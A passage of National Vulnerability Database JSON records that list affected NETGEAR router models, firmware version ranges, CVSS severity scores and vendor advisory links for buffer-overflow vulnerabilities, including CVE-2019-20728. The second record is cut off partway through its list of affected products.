"criteria": "cpe:2.3:h:netgear:rbr50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B2CAEA32-6934-4743-9E6B-22D52AC5E7F8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbs50_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C489444C-6C19-4A52-AF66-A1D48ADC4F26",
"versionEndExcluding": "2.3.5.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbs50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3BCFD959-D522-4FA0-AD01-2937DAEE1EDF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbw30_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E993AF26-3505-4FD8-8842-F5E613CDDC2E",
"versionEndExcluding": "2.1.2.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbw30:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FEA73D22-970D-45F2-81F3-9576C04CCC94",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D1A9B6F-89B2-4785-A0E2-3FD322D6A28F",
"versionEndExcluding": "1.0.4.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "110B10A0-1969-4FDE-9289-6EAB81D1657B",
"versionEndExcluding": "1.0.4.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB86B739-440E-4269-92EC-F7F3058E4406",
"versionEndExcluding": "1.0.1.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4EAD37-164F-4631-8DED-AB9BD41D2429",
"versionEndExcluding": "1.0.2.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B0BCDB34-EC1F-43A1-AA7D-BF4CA1F4C168",
"versionEndExcluding": "1.0.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A71BAC6A-F08E-4015-9A54-3CF5FDF85950",
"versionEndExcluding": "1.0.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5352DD0A-3388-423C-B6E3-38FFF8B4700F",
"versionEndExcluding": "1.0.9.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0CB1E644-FB4B-443B-B9D7-349F0024FB74",
"versionEndExcluding": "1.3.0.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EFFC911D-B2A3-47D7-940A-76978458CEA5",
"versionEndExcluding": "1.3.0.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB388895-B579-43B7-A88E-4BD28D41F6E2",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "999A4F9A-D803-47D0-94F5-4626669D8DE0",
"versionEndExcluding": "1.0.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9ACBF492-1315-46CF-8297-E239DDB14B6B",
"versionEndExcluding": "1.0.3.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E0DFBF4-E393-44AE-AEF9-1B2059EE5AE8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DE1B60E4-C8FA-4094-9F05-1746A01557D9",
"versionEndExcluding": "1.0.2.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "17CF7445-6950-45FE-9D1A-E23F63316329",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0C9AB4A-497B-4D5C-93E3-430C3361E24F",
"versionEndExcluding": "1.0.2.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72C46066-B210-44BB-9219-14B2E8CCEF8E",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B19B770D-4660-4B12-8B5C-B689DA8CCB64",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2DDFF20-B761-4E45-9F16-CE15C82AAB5C",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7E4D2E75-1ADA-4ECE-B1B5-12E28913063E",
"versionEndExcluding": "1.0.2.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16C3369B-3E65-4CB7-BFF0-5052DBB16C45",
"versionEndExcluding": "1.0.2.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "610C6DB8-E11E-4EAE-A16F-189283F70B26",
"versionEndExcluding": "1.0.3.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0F859165-8D89-4CDD-9D48-9C7923D2261F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r9000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EEFCBDB9-47D0-40EF-9428-FF714763BC12",
"versionEndExcluding": "1.0.3.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r9000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D74F1BFC-562E-4E7D-BBAB-2F8B593B5A57",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38BC0F78-4571-45E6-9023-CD1AEA7DF8EF",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FAF6A089-4E7D-43D1-AF1F-01A7A592115E",
"versionEndExcluding": "1.0.2.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "257A5E68-8EDC-44F5-A85C-83A91C93CCE5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EF96C0EB-8CB6-4C86-A9A2-A4C7AF58C97F",
"versionEndExcluding": "1.0.2.98",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "D99E146D-B278-4CA6-8156-7D9923015779",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5A295B-77E9-4F8B-B523-56C7A1472AD9",
"versionEndExcluding": "1.0.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4428B145-B86D-4709-BBA9-64BDE7D35A25",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A5B27DF7-FA36-4A0E-A7B0-0D29BE9434BE",
"versionEndExcluding": "1.0.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "C31D6808-4103-4543-B7AB-84A79CD12006",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "124ABC0A-DD68-4540-AAC2-C4E87CDC91A7",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2000:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "317F25FF-B3A2-4C68-888F-D2627C564867",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "263DFC40-2EED-49F3-AAA5-0F5D7EAC2DF3",
"versionEndExcluding": "1.2.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, DM200 before 1.0.0.52, JNDR3000 before 1.0.0.22, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, RBW30 before 2.1.2.6, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.10, R9000 before 1.0.3.10, WNDR3400v3 before 1.0.1.18, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.54, WNDR4500v3 before 1.0.0.54, WNR2000v5 before 1.0.0.64, and WNR3500Lv2 before 1.2.0.48."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer por parte de un usuario autenticado. Esto afecta a D6400 versiones anteriores a 1.0.0.74, D7000v2 versiones anteriores a 1.0.0.74, D7800 versiones anteriores a 1.0.1.34, D8500 versiones anteriores a 1.0.3.39, DGN2200v4 versiones anteriores a 1.0.0.102, DGND2200Bv4 versiones anteriores a 1.0.0.102, DM200 versiones anteriores a 1.0.0.52, JNDR3000 versiones anteriores a 1.0.0.22, RBK50 versiones anteriores a 2.3.5.30, RBR50 versiones anteriores a 2.3. 5.30, RBS50 versiones anteriores a 2.3.5.30, RBW30 versiones anteriores a 2.1.2.6, R6250 versiones anteriores a 1.0.4.26, R6300v2 versiones anteriores a 1.0.4.24, R6400 versiones anteriores a 1.0.1. 36, R6400v2 versiones anteriores a 1.0.2.52, R6700 versiones anteriores a 1.0.1.44, R6900 versiones anteriores a 1.0.1.44, R7000 versiones anteriores a 1.0.9.26, R6900P versiones anteriores a 1.3.0.20, R7000P versiones anteriores a 1. 3.0.20, R7100LG versiones anteriores a 1.0.0.40, R7300DST versiones anteriores a 1.0.0.62, R7500v2 versiones anteriores a 1.0.3.26, R7800 versiones anteriores a 1.0.2.44, R7900 versiones anteriores a 1.0.2.10, R8000 versiones anteriores a 1.0.4.12, R7900P versiones anteriores a 1.3.0.10, R8000P versiones anteriores a 1.3.0.10, R8300 versiones anteriores a 1.0.2.116, R8500 versiones anteriores a 1.0.2. 116, R8900 versiones anteriores a 1.0.3.10, R9000 versiones anteriores a 1.0.3.10, WNDR3400v3 versiones anteriores a 1.0.1.18, WNDR3700v4 versiones anteriores a 1.0.2.96, WNDR4300v1 versiones anteriores a 1. 0.2.98, WNDR4300v2 versiones anteriores a 1.0.0.54, WNDR4500v3 versiones anteriores a 1.0.0.54, WNR2000v5 versiones anteriores a 1.0.0.64, y WNR3500Lv2 versiones anteriores a 1.2.0.48."
}
],
"id": "CVE-2019-20728",
"lastModified": "2024-11-21T04:39:12.090",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
"version": "3.0"
},
"exploitabilityScore": 0.8,
"impactScore": 5.5,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T20:15:13.210",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061199/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-WiFi-Systems-PSV-2017-315"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061199/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-WiFi-Systems-PSV-2017-315"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 19:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.44, R7000P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "114EDC62-9DAE-45D9-8A90-A533BBBF50EB",
"versionEndExcluding": "1.0.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7AD596B6-3D11-456F-8BD0-2E7153BA5F53",
"versionEndExcluding": "1.0.0.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52FB0300-0FC9-4797-BACB-84D7D932A386",
"versionEndExcluding": "1.0.0.51",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "629E89E8-F329-4D11-9652-540752084DD3",
"versionEndExcluding": "1.0.3.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "91EFE482-AAF5-4B46-9658-94B1072F3CD2",
"versionEndExcluding": "1.0.0.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgnd2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "025234D6-A814-4669-9814-3631B54B753D",
"versionEndExcluding": "1.0.0.109",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgnd2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "D6EBFFCE-0D9E-4383-8CD6-3DC4D2412446",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54C9BF9A-F891-4337-AAFF-6E192A81B45B",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
